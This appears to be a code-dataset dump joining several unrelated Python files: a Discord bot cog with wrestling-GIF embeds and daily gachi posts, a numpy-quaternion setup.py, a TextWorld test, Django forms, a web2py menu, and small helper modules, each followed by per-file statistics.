WrestlingGif('https://i.imgur.com/l137Zzh.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/tFZv2j9.gif', "**{recipient.name}** and **{author.name}** engage in a fight. **{author.name}** makes the first move"),
WrestlingGif('https://i.imgur.com/kVXjE3Q.gif', "**{author.name}** pulls **{recipient.name}**'s hands"),
WrestlingGif('https://i.imgur.com/4IsfXSD.gif', "**{author.name}** has **{recipient.name}** locked down"),
WrestlingGif('https://i.imgur.com/HnLRl26.gif', "**{author.name}** spins **{recipient.name}** right round baby right round"),
WrestlingGif('https://i.imgur.com/uJtuZ4V.gif', "**{author.name}** beats **{recipient.name}** up and locks him down"),
WrestlingGif('https://i.imgur.com/ZgXNVIb.gif', "**{recipient.name}** flails his arms around helplessly"),
WrestlingGif('https://i.imgur.com/Jcu4NyL.gif', "**{author.name}** manages to get a quick jab in at **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/XUpxidH.gif', "**{author.name}** pulls on **{recipient.name}**'s leg"),
WrestlingGif('https://i.imgur.com/pTBy6ap.gif', "**{recipient.name}** and **{author.name}** engage in a hugging competition"),
WrestlingGif('https://i.imgur.com/ggTj4xI.gif', "**{author.name}** escapes **{recipient.name}**'s hold and counters"),
WrestlingGif('https://i.imgur.com/lS2zZre.gif', "**{author.name}** locks **{recipient.name}**'s legs"),
WrestlingGif('https://i.imgur.com/fdgI1Br.gif', "**{recipient.name}** gets choked by **{author.name}** and tries to escape but fails"),
]
class gachiGASM(Cog):
def __init__(self, bot):
super().__init__(bot)
self.gachilist = self.bot.gachilist
if not self.gachilist:
self.reload_gachilist()
self._start_task = self._reload_and_post.start()
logger.info(f'Starting gachi loop.\n{"".join(traceback.format_stack()[-8:])}')
def cog_unload(self):
self._reload_and_post.cancel()
@tasks.loop(time=time(tzinfo=timezone.utc), reconnect=False)
async def _reload_and_post(self):
logger.info(f'Start task is {self._start_task}, '
f'current task is {self._reload_and_post.get_task()}, '
f'fail status: {self._reload_and_post._last_iteration_failed}, '
f'next iter {self._reload_and_post.next_iteration}.\n{"".join(traceback.format_stack()[-8:])}')
self.reload_gachilist()
for guild in self.bot.guilds:
channel = self.bot.guild_cache.dailygachi(guild.id)
if not channel:
continue
channel = guild.get_channel(channel)
if not channel:
continue
vid = Random(self.get_day()+guild.id).choice(self.gachilist)
try:
await channel.send(f'Daily gachi {vid}')
except disnake.HTTPException:
pass
def reload_gachilist(self):
self.bot.gachilist = read_lines(os.path.join(PLAYLISTS, 'gachi.txt'))
self.gachilist = self.bot.gachilist
@staticmethod
def get_day():
return (datetime.utcnow() - datetime.min).days
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify(self, ctx, *, words):
"""Gachify a string"""
if ' ' not in words:
# We need to undo the string view or it will skip the first word
ctx.view.undo()
await self.gachify2.invoke(ctx)
else:
return await ctx.send(words.replace(' ', r' \♂ ').upper()[:2000])
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify2(self, ctx, *, words):
"""An alternative way of gachifying"""
s = r'\♂ ' + words.replace(' ', r' \♂ ').upper() + r' \♂'
return await ctx.send(s[:2000])
@command(aliases=['rg'])
@cooldown(1, 5, BucketType.channel)
async def randomgachi(self, ctx):
await ctx.send(choice(self.gachilist))
@group(invoke_without_command=True, aliases=['dg'])
@guild_only()
@cooldown(1, 5, BucketType.channel)
async def dailygachi(self, ctx):
await ctx.send(Random(self.get_day()+ctx.guild.id).choice(self.gachilist))
@dailygachi.command(np_pm=True)
@cooldown(1, 5)
@has_permissions(manage_guild=True)
async def subscribe(self, ctx, *, channel: disnake.TextChannel=None):
if channel:
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, channel.id)
return await ctx.send(f'New dailygachi channel set to {channel}')
channel = self.bot.guild_cache.dailygachi(ctx.guild.id)
channel = ctx.guild.get_channel(channel)
if channel:
await ctx.send(f'Current dailygachi channel is {channel}')
else:
await ctx.send('No dailygachi channel set')
@dailygachi.command()
@cooldown(1, 5)
@has_permissions(manage_guild=True)
@guild_only()
async def unsubscribe(self, ctx):
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, None)
await ctx.send('Dailygachi channel no longer set')
@command()
@cooldown(1, 5, BucketType.member)
@guild_only()
async def wrestle(self, ctx, *, user: disnake.User):
if user == ctx.author:
await ctx.send('Wrestling against yourself...')
return
wrestling_gif = choice(wrestling_gifs)
await ctx.send(embed=wrestling_gif.build_embed(ctx.author, user))
def setup(bot):
bot.add_cog(gachiGASM(bot))
| 54.416244
| 156
| 0.648601
|
import logging
import os
import traceback
from datetime import datetime, time, timezone
from random import Random, choice
import disnake
from disnake.ext import tasks
from disnake.ext.commands import BucketType, cooldown, guild_only
from bot.bot import command, group, has_permissions
from bot.globals import PLAYLISTS
from cogs.cog import Cog
from utils.utilities import read_lines
logger = logging.getLogger('terminal')
class WrestlingGif:
def __init__(self, url, text):
self.url = url
self.text = text
def build_embed(self, author, recipient):
description = self.text.format(author=author, recipient=recipient)
embed = disnake.Embed(description=description)
embed.set_image(url=self.url)
return embed
wrestling_gifs = [
WrestlingGif('https://i.imgur.com/xUi2Vq1.gif', "**{recipient.name}** tries to grab but it fails. **{author.name}** grabs **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/osDWTHG.gif', "**{recipient.name}** tries to escape but **{author.name}** pins them down"),
WrestlingGif('https://i.imgur.com/HS6R463.gif', "**{author.name}** lifts **{recipient.name}** up. **{recipient.name}** is powerless to do anything"),
WrestlingGif('https://i.imgur.com/jbE2XVt.gif', "**{author.name}** challenges **{recipient.name}** to a friendly wrestling match"),
WrestlingGif('https://i.imgur.com/XVUjH9x.gif', "**{recipient.name}** tries to attack but **{author.name}** counters"),
WrestlingGif('https://i.imgur.com/vTeoYAE.gif', "**{author.name}** and **{recipient.name}** engage in a battle of strength"),
WrestlingGif('https://i.imgur.com/iu2kiVy.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/BulkVW1.gif', "**{author.name}** gets **{recipient.name}** with a knee strike"),
WrestlingGif('https://i.imgur.com/zXaIYLp.gif', "**{author.name}** beats **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/XNOMUcg.gif', "**{author.name}** delivers a low blow to **{recipient.name}**. Nasty strategy"),
WrestlingGif('https://i.imgur.com/oSG0V6a.gif', "**{recipient.name}** gets beaten by **{author.name}**"),
WrestlingGif('https://i.imgur.com/u0H0ZSA.gif', "**{author.name}** grabs **{recipient.name}**s fucking pants <:GWjojoGachiGASM:363025405562585088>"),
WrestlingGif('https://i.imgur.com/VFruiTR.gif', "**{author.name}** flexes on **{recipient.name}** after kicking their ass. WOO"),
WrestlingGif('https://i.imgur.com/YCd1aSo.gif', "**{author.name}** beats **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/M3sAu23.gif', "**{author.name}** chokes **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/inEROy3.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/8qI8f1M.gif', "**{author.name}** battles **{recipient.name}** in a feat of pure strength"),
WrestlingGif('https://i.imgur.com/xhVIjIt.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/RW07zr0.gif', "**{author.name}** escapes the choke of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/g6wVGpG.gif', "**{author.name}** escapes **{recipient.name}**s grab and begins a counter-attack"),
WrestlingGif('https://i.imgur.com/LKHtUeo.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/eCCAKoA.gif', "It's time to wrestle"),
WrestlingGif('https://i.imgur.com/ZFiT5Ew.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/A4Oo0Tp.gif', "**{author.name}** puts **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/COQlI5t.gif', "**{author.name}** swaps positions with **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/pIaErDy.gif', "**{author.name}** pulls **{recipient.name}**s arms"),
WrestlingGif('https://i.imgur.com/hThhSrl.gif', "**{author.name}** locks **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/goMZvRE.gif', "**{author.name}** turns the tables on **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/3A9eMu0.gif', "**{author.name}** slams **{recipient.name}** on the floor"),
WrestlingGif('https://i.imgur.com/G9Iklxu.gif', "**{author.name}** and **{recipient.name}** are in the middle of an intense battle"),
WrestlingGif('https://i.imgur.com/c1CQBnJ.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/cKcOJo0.gif', "**{author.name}** pulls **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/Q41oEne.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/AP7MRnF.gif', "**{author.name}** escapes the hold of **{recipient.name}** and is ready for more"),
WrestlingGif('https://i.imgur.com/6khggL1.gif', "**{author.name}** pulls the hair of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/bq0Bjbl.gif', "**{author.name}** got the moves"),
WrestlingGif('https://i.imgur.com/aIVoytr.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/l137Zzh.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/tFZv2j9.gif', "**{recipient.name}** and **{author.name}** engage in a fight. **{author.name}** makes the first move"),
WrestlingGif('https://i.imgur.com/kVXjE3Q.gif', "**{author.name}** pulls **{recipient.name}**'s hands"),
WrestlingGif('https://i.imgur.com/4IsfXSD.gif', "**{author.name}** has **{recipient.name}** locked down"),
WrestlingGif('https://i.imgur.com/HnLRl26.gif', "**{author.name}** spins **{recipient.name}** right round baby right round"),
WrestlingGif('https://i.imgur.com/uJtuZ4V.gif', "**{author.name}** beats **{recipient.name}** up and locks him down"),
WrestlingGif('https://i.imgur.com/ZgXNVIb.gif', "**{recipient.name}** flails his arms around helplessly"),
WrestlingGif('https://i.imgur.com/Jcu4NyL.gif', "**{author.name}** manages to get a quick jab in at **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/XUpxidH.gif', "**{author.name}** pulls on **{recipient.name}**'s leg"),
WrestlingGif('https://i.imgur.com/pTBy6ap.gif', "**{recipient.name}** and **{author.name}** engage in a hugging competition"),
WrestlingGif('https://i.imgur.com/ggTj4xI.gif', "**{author.name}** escapes **{recipient.name}**'s hold and counters"),
WrestlingGif('https://i.imgur.com/lS2zZre.gif', "**{author.name}** locks **{recipient.name}**'s legs"),
WrestlingGif('https://i.imgur.com/fdgI1Br.gif', "**{recipient.name}** gets choked by **{author.name}** and tries to escape but fails"),
]
class gachiGASM(Cog):
def __init__(self, bot):
super().__init__(bot)
self.gachilist = self.bot.gachilist
if not self.gachilist:
self.reload_gachilist()
self._start_task = self._reload_and_post.start()
logger.info(f'Starting gachi loop.\n{"".join(traceback.format_stack()[-8:])}')
def cog_unload(self):
self._reload_and_post.cancel()
@tasks.loop(time=time(tzinfo=timezone.utc), reconnect=False)
async def _reload_and_post(self):
logger.info(f'Start task is {self._start_task}, '
f'current task is {self._reload_and_post.get_task()}, '
f'fail status: {self._reload_and_post._last_iteration_failed}, '
f'next iter {self._reload_and_post.next_iteration}.\n{"".join(traceback.format_stack()[-8:])}')
self.reload_gachilist()
for guild in self.bot.guilds:
channel = self.bot.guild_cache.dailygachi(guild.id)
if not channel:
continue
channel = guild.get_channel(channel)
if not channel:
continue
vid = Random(self.get_day()+guild.id).choice(self.gachilist)
try:
await channel.send(f'Daily gachi {vid}')
except disnake.HTTPException:
pass
def reload_gachilist(self):
self.bot.gachilist = read_lines(os.path.join(PLAYLISTS, 'gachi.txt'))
self.gachilist = self.bot.gachilist
@staticmethod
def get_day():
return (datetime.utcnow() - datetime.min).days
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify(self, ctx, *, words):
if ' ' not in words:
# We need to undo the string view or it will skip the first word
ctx.view.undo()
await self.gachify2.invoke(ctx)
else:
return await ctx.send(words.replace(' ', r' \♂ ').upper()[:2000])
@command()
@cooldown(1, 2, BucketType.channel)
async def gachify2(self, ctx, *, words):
s = r'\♂ ' + words.replace(' ', r' \♂ ').upper() + r' \♂'
return await ctx.send(s[:2000])
@command(aliases=['rg'])
@cooldown(1, 5, BucketType.channel)
async def randomgachi(self, ctx):
await ctx.send(choice(self.gachilist))
@group(invoke_without_command=True, aliases=['dg'])
@guild_only()
@cooldown(1, 5, BucketType.channel)
async def dailygachi(self, ctx):
await ctx.send(Random(self.get_day()+ctx.guild.id).choice(self.gachilist))
@dailygachi.command(np_pm=True)
@cooldown(1, 5)
@has_permissions(manage_guild=True)
async def subscribe(self, ctx, *, channel: disnake.TextChannel=None):
if channel:
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, channel.id)
return await ctx.send(f'New dailygachi channel set to {channel}')
channel = self.bot.guild_cache.dailygachi(ctx.guild.id)
channel = ctx.guild.get_channel(channel)
if channel:
await ctx.send(f'Current dailygachi channel is {channel}')
else:
await ctx.send('No dailygachi channel set')
@dailygachi.command()
@cooldown(1, 5)
@has_permissions(manage_guild=True)
@guild_only()
async def unsubscribe(self, ctx):
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, None)
await ctx.send('Dailygachi channel no longer set')
@command()
@cooldown(1, 5, BucketType.member)
@guild_only()
async def wrestle(self, ctx, *, user: disnake.User):
if user == ctx.author:
await ctx.send('Wrestling against yourself...')
return
wrestling_gif = choice(wrestling_gifs)
await ctx.send(embed=wrestling_gif.build_embed(ctx.author, user))
def setup(bot):
bot.add_cog(gachiGASM(bot))
| true
| true
|
f705a3715e94cf0904331d0ec946cb635a00608e
| 4,169
|
py
|
Python
|
setup.py
|
igilitschenski/quaternion
|
44dd138fa7e95e55d0ccd4a7620a3587cf314b4f
|
[
"MIT"
] | 2
|
2018-08-12T02:01:37.000Z
|
2020-05-12T11:56:07.000Z
|
setup.py
|
igilitschenski/quaternion
|
44dd138fa7e95e55d0ccd4a7620a3587cf314b4f
|
[
"MIT"
] | 1
|
2018-08-12T21:05:01.000Z
|
2018-08-12T21:05:01.000Z
|
setup.py
|
igilitschenski/quaternion
|
44dd138fa7e95e55d0ccd4a7620a3587cf314b4f
|
[
"MIT"
] | 1
|
2020-10-01T08:49:33.000Z
|
2020-10-01T08:49:33.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, Michael Boyle
# See LICENSE file for details: <https://github.com/moble/quaternion/blob/master/LICENSE>
# Construct the version number from the date and time this python version was created.
from os import environ
from sys import platform
on_windows = ('win' in platform.lower() and not 'darwin' in platform.lower())
if "package_version" in environ:
version = environ["package_version"]
print("Setup.py using environment version='{0}'".format(version))
else:
print("The variable 'package_version' was not present in the environment")
try:
# For cases where this is being installed from git. This gives the true version number.
from subprocess import check_output
if on_windows:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%m.%d.%H.%M.%S'""", shell=False)
version = version.decode('ascii').strip().replace('.0', '.').replace("'", "")
else:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%-m.%-d.%-H.%-M.%-S'""", shell=True).decode('ascii').rstrip()
print("Setup.py using git log version='{0}'".format(version))
except:
# For cases where this isn't being installed from git. This gives the wrong version number,
# but at least it provides some information.
try:
from time import strftime, gmtime
try:
version = strftime("%Y.%-m.%-d.%-H.%-M.%-S", gmtime())
except ValueError: # because Windows
version = strftime("%Y.%m.%d.%H.%M.%S", gmtime()).replace('.0', '.')
print("Setup.py using strftime version='{0}'".format(version))
except:
version = '0.0.0'
print("Setup.py failed to determine the version; using '{0}'".format(version))
with open('_version.py', 'w') as f:
f.write('__version__ = "{0}"'.format(version))
long_description = """\
This package creates a quaternion type in python, and further enables numpy to create and manipulate arrays of
quaternions. The usual algebraic operations (addition and multiplication) are available, along with numerous
properties like norm and various types of distance measures between two quaternions. There are also
additional functions like "squad" and "slerp" interpolation, and conversions to and from axis-angle, matrix,
and Euler-angle representations of rotations. The core of the code is written in C for speed.
"""
if __name__ == "__main__":
import numpy
from setuptools import setup, Extension
# from distutils.core import setup, Extension
from distutils.errors import DistutilsError
if numpy.__dict__.get('quaternion') is not None:
raise DistutilsError('The target NumPy already has a quaternion type')
extension = Extension(
name='quaternion.numpy_quaternion', # This is the name of the object file that will be compiled
sources=['quaternion.c', 'numpy_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['quaternion.c', 'quaternion.h', 'numpy_quaternion.c'],
include_dirs=[numpy.get_include()]
)
extension2 = Extension(
name='quaternion.numpy_dual_quaternion', # This is the name of the object file that will be compiled
sources=['dual_quaternion.c', 'numpy_dual_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['dual_quaternion.c', 'dual_quaternion.h', 'numpy_dual_quaternion.c'],
include_dirs=[numpy.get_include()]
)
setup(name='numpy-quaternion', # Uploaded to pypi under this name
packages=['quaternion'], # This is the actual package name
package_dir={'quaternion': ''},
ext_modules=[extension, extension2],
version=version,
install_requires=[
'numpy>=1.13',
],
url='https://github.com/moble/quaternion',
author='Michael Boyle',
author_email='mob22@cornell.edu',
description='Add built-in support for quaternions to numpy',
long_description=long_description,
)
| 49.047059
| 141
| 0.656272
|
from os import environ
from sys import platform
on_windows = ('win' in platform.lower() and not 'darwin' in platform.lower())
if "package_version" in environ:
version = environ["package_version"]
print("Setup.py using environment version='{0}'".format(version))
else:
print("The variable 'package_version' was not present in the environment")
try:
from subprocess import check_output
if on_windows:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%m.%d.%H.%M.%S'""", shell=False)
version = version.decode('ascii').strip().replace('.0', '.').replace("'", "")
else:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%-m.%-d.%-H.%-M.%-S'""", shell=True).decode('ascii').rstrip()
print("Setup.py using git log version='{0}'".format(version))
except:
# For cases where this isn't being installed from git. This gives the wrong version number,
try:
from time import strftime, gmtime
try:
version = strftime("%Y.%-m.%-d.%-H.%-M.%-S", gmtime())
except ValueError:
version = strftime("%Y.%m.%d.%H.%M.%S", gmtime()).replace('.0', '.')
print("Setup.py using strftime version='{0}'".format(version))
except:
version = '0.0.0'
print("Setup.py failed to determine the version; using '{0}'".format(version))
with open('_version.py', 'w') as f:
f.write('__version__ = "{0}"'.format(version))
long_description = """\
This package creates a quaternion type in python, and further enables numpy to create and manipulate arrays of
quaternions. The usual algebraic operations (addition and multiplication) are available, along with numerous
properties like norm and various types of distance measures between two quaternions. There are also
additional functions like "squad" and "slerp" interpolation, and conversions to and from axis-angle, matrix,
and Euler-angle representations of rotations. The core of the code is written in C for speed.
"""
if __name__ == "__main__":
import numpy
from setuptools import setup, Extension
from distutils.errors import DistutilsError
if numpy.__dict__.get('quaternion') is not None:
raise DistutilsError('The target NumPy already has a quaternion type')
extension = Extension(
name='quaternion.numpy_quaternion',
sources=['quaternion.c', 'numpy_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['quaternion.c', 'quaternion.h', 'numpy_quaternion.c'],
include_dirs=[numpy.get_include()]
)
extension2 = Extension(
name='quaternion.numpy_dual_quaternion',
sources=['dual_quaternion.c', 'numpy_dual_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['dual_quaternion.c', 'dual_quaternion.h', 'numpy_dual_quaternion.c'],
include_dirs=[numpy.get_include()]
)
setup(name='numpy-quaternion',
packages=['quaternion'],
package_dir={'quaternion': ''},
ext_modules=[extension, extension2],
version=version,
install_requires=[
'numpy>=1.13',
],
url='https://github.com/moble/quaternion',
author='Michael Boyle',
author_email='mob22@cornell.edu',
description='Add built-in support for quaternions to numpy',
long_description=long_description,
)
| true
| true
|
f705a4cd64c0bf62c1cc3fdc3fdff2a1600a087a
| 879
|
py
|
Python
|
textworld/challenges/tests/test_coin_collector.py
|
JohnnySun8/TextWorld
|
9a54e9d642f7605a0f3ebba3285cdd04047975e2
|
[
"MIT"
] | 307
|
2019-05-07T01:51:55.000Z
|
2022-03-31T19:35:47.000Z
|
textworld/challenges/tests/test_coin_collector.py
|
JohnnySun8/TextWorld
|
9a54e9d642f7605a0f3ebba3285cdd04047975e2
|
[
"MIT"
] | 84
|
2019-05-08T14:24:36.000Z
|
2022-03-31T14:35:16.000Z
|
textworld/challenges/tests/test_coin_collector.py
|
JohnnySun8/TextWorld
|
9a54e9d642f7605a0f3ebba3285cdd04047975e2
|
[
"MIT"
] | 70
|
2019-05-21T21:36:56.000Z
|
2022-02-28T12:04:27.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
import textworld
from textworld.challenges import coin_collector
def test_making_coin_collector():
expected = {
1: {"quest_length": 1, "nb_rooms": 1},
100: {"quest_length": 100, "nb_rooms": 100},
101: {"quest_length": 1, "nb_rooms": 2},
200: {"quest_length": 100, "nb_rooms": 200},
201: {"quest_length": 1, "nb_rooms": 3},
300: {"quest_length": 100, "nb_rooms": 300},
}
for level in [1, 100, 101, 200, 201, 300]:
options = textworld.GameOptions()
options.seeds = 1234
settings = {"level": level}
game = coin_collector.make(settings, options)
assert len(game.quests[0].commands) == expected[level]["quest_length"]
assert len(game.world.rooms) == expected[level]["nb_rooms"]
| 35.16
| 78
| 0.624573
|
import textworld
from textworld.challenges import coin_collector
def test_making_coin_collector():
expected = {
1: {"quest_length": 1, "nb_rooms": 1},
100: {"quest_length": 100, "nb_rooms": 100},
101: {"quest_length": 1, "nb_rooms": 2},
200: {"quest_length": 100, "nb_rooms": 200},
201: {"quest_length": 1, "nb_rooms": 3},
300: {"quest_length": 100, "nb_rooms": 300},
}
for level in [1, 100, 101, 200, 201, 300]:
options = textworld.GameOptions()
options.seeds = 1234
settings = {"level": level}
game = coin_collector.make(settings, options)
assert len(game.quests[0].commands) == expected[level]["quest_length"]
assert len(game.world.rooms) == expected[level]["nb_rooms"]
| true
| true
|
f705a62076eaad583f13420e3065b76727c22256
| 2,831
|
py
|
Python
|
core/cooggerapp/forms.py
|
maksatweb/coogger
|
480d4cccb2c6876fba116511b72775e2e434245b
|
[
"MIT"
] | null | null | null |
core/cooggerapp/forms.py
|
maksatweb/coogger
|
480d4cccb2c6876fba116511b72775e2e434245b
|
[
"MIT"
] | null | null | null |
core/cooggerapp/forms.py
|
maksatweb/coogger
|
480d4cccb2c6876fba116511b72775e2e434245b
|
[
"MIT"
] | 1
|
2019-07-01T10:08:33.000Z
|
2019-07-01T10:08:33.000Z
|
# django
from django import forms
from django.contrib.auth.models import User
# choices
from core.cooggerapp.choices import *
# models
from core.cooggerapp.models import (
Content, OtherAddressesOfUsers, UserProfile,
ReportModel, UTopic, Issue)
from .models.utils import send_mail
class UTopicForm(forms.ModelForm):
class Meta:
model = UTopic
fields = ["name", "image_address", "definition", "tags", "address"]
class ContentForm(forms.ModelForm):
msg = forms.CharField(
max_length=150,
label="Commit Message",
help_text="What has changed with this update?"
)
class Meta:
model = Content
fields = ["category", "language", "title", "body", "tags"]
@classmethod
def send_mail(cls, form):
send_mail(
subject = f"{form.user} publish a new content | coogger".title(),
template_name="email/post.html",
context=dict(
get_absolute_url=form.get_absolute_url
),
to=[u.user.email for u in form.user.follow.follower if u.user.email],
)
class ReplyForm(forms.ModelForm):
class Meta:
model = Content
fields = ["title", "body"]
class AddressesForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class CSettingsUserForm(forms.ModelForm):
class Meta:
model = User
fields = ["first_name", "last_name", "username", "email"]
class OtherAddressesOfUsersForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class AboutForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ["about"]
class ReportsForm(forms.ModelForm):
class Meta:
model = ReportModel
fields = ["complaints", "add"]
class NewIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = ["title", "body"]
@classmethod
def send_mail(cls, form):
send_mail(
subject=f"{form.user} opened a new issue on your {form.utopic.name} topic | coogger".title(),
template_name="email/new-issue.html",
context=dict(
form=form,
),
to=[form.utopic.user.email]
)
class NewIssueReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="problem | question | or anything else")
class Meta:
model = Issue
fields = ["body"]
class NewContentReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="Your content | problem | question | or anything else")
class Meta:
model = Content
fields = ["body"]
| 23.396694
| 106
| 0.607559
|
from django import forms
from django.contrib.auth.models import User
from core.cooggerapp.choices import *
from core.cooggerapp.models import (
Content, OtherAddressesOfUsers, UserProfile,
ReportModel, UTopic, Issue)
from .models.utils import send_mail
class UTopicForm(forms.ModelForm):
class Meta:
model = UTopic
fields = ["name", "image_address", "definition", "tags", "address"]
class ContentForm(forms.ModelForm):
msg = forms.CharField(
max_length=150,
label="Commit Message",
help_text="What has changed with this update?"
)
class Meta:
model = Content
fields = ["category", "language", "title", "body", "tags"]
@classmethod
def send_mail(cls, form):
send_mail(
subject = f"{form.user} publish a new content | coogger".title(),
template_name="email/post.html",
context=dict(
get_absolute_url=form.get_absolute_url
),
to=[u.user.email for u in form.user.follow.follower if u.user.email],
)
class ReplyForm(forms.ModelForm):
class Meta:
model = Content
fields = ["title", "body"]
class AddressesForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class CSettingsUserForm(forms.ModelForm):
class Meta:
model = User
fields = ["first_name", "last_name", "username", "email"]
class OtherAddressesOfUsersForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class AboutForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ["about"]
class ReportsForm(forms.ModelForm):
class Meta:
model = ReportModel
fields = ["complaints", "add"]
class NewIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = ["title", "body"]
@classmethod
def send_mail(cls, form):
send_mail(
subject=f"{form.user} opened a new issue on your {form.utopic.name} topic | coogger".title(),
template_name="email/new-issue.html",
context=dict(
form=form,
),
to=[form.utopic.user.email]
)
class NewIssueReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="problem | question | or anything else")
class Meta:
model = Issue
fields = ["body"]
class NewContentReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="Your content | problem | question | or anything else")
class Meta:
model = Content
fields = ["body"]
| true
| true
|
f705a73863c89acb45d5d05655334e8f3a3a5738
| 219
|
py
|
Python
|
python/tdd/math/prime.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-08-19T13:40:26.000Z
|
2021-08-19T13:40:26.000Z
|
python/tdd/math/prime.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | null | null | null |
python/tdd/math/prime.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-03-31T12:37:14.000Z
|
2021-03-31T12:37:14.000Z
|
from math import ceil, sqrt
def my_sqrt(input_num):
return ceil(sqrt(input_num))
def is_divisible(dividend, divisor):
return dividend % divisor == 0
def is_prime(input_num):
return True
| 14.6
| 37
| 0.666667
|
from math import ceil, sqrt
def my_sqrt(input_num):
return ceil(sqrt(input_num))
def is_divisible(dividend, divisor):
return dividend % divisor == 0
def is_prime(input_num):
return True
| true
| true
|
f705a7e2c833ec94fe1fa23667a30b153375cf95
| 55
|
py
|
Python
|
pymatgen/phonon/__init__.py
|
cajfisher/pymatgen
|
286c304e38102d567723a71f733e0c304b72035d
|
[
"MIT"
] | 921
|
2015-01-25T22:17:05.000Z
|
2022-03-27T20:58:38.000Z
|
pymatgen/phonon/__init__.py
|
cajfisher/pymatgen
|
286c304e38102d567723a71f733e0c304b72035d
|
[
"MIT"
] | 1,631
|
2015-01-05T21:05:04.000Z
|
2022-03-31T18:40:17.000Z
|
pymatgen/phonon/__init__.py
|
cajfisher/pymatgen
|
286c304e38102d567723a71f733e0c304b72035d
|
[
"MIT"
] | 851
|
2015-01-01T17:38:00.000Z
|
2022-03-31T02:14:07.000Z
|
"""
Phonon DOS and bandstructure analysis package.
"""
| 13.75
| 46
| 0.727273
| true
| true
|
|
f705a8ee33fb9360f9cccd2c289e63ed88006920
| 6,249
|
py
|
Python
|
applications/welcome/models/menu.py
|
Gorang-Maniar/DGD
|
c7b2624c0d0bb0127214ec3804acbe2cc70f8ce0
|
[
"BSD-3-Clause"
] | 8
|
2018-04-13T14:54:02.000Z
|
2021-03-04T10:58:09.000Z
|
webui/applications/grid/models/menu.py
|
pouyana/teireader
|
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
|
[
"MIT"
] | 39
|
2018-03-23T09:25:38.000Z
|
2022-03-23T15:22:15.000Z
|
webui/applications/grid/models/menu.py
|
pouyana/teireader
|
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
|
[
"MIT"
] | 3
|
2019-04-09T03:49:21.000Z
|
2020-03-05T03:51:25.000Z
|
# -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
#########################################################################
## Customize your APP title, subtitle and menus here
#########################################################################
response.logo = A(B('web',SPAN(2),'py'),XML('™ '),
_class="brand",_href="http://www.web2py.com/")
response.title = request.application.replace('_',' ').title()
response.subtitle = ''
## read more at http://dev.w3.org/html5/markup/meta.name.html
response.meta.author = 'Your Name <you@example.com>'
response.meta.description = 'a cool new app'
response.meta.keywords = 'web2py, python, framework'
response.meta.generator = 'Web2py Web Framework'
## your http://google.com/analytics id
response.google_analytics_id = None
#########################################################################
## this is the main application menu add/remove items as required
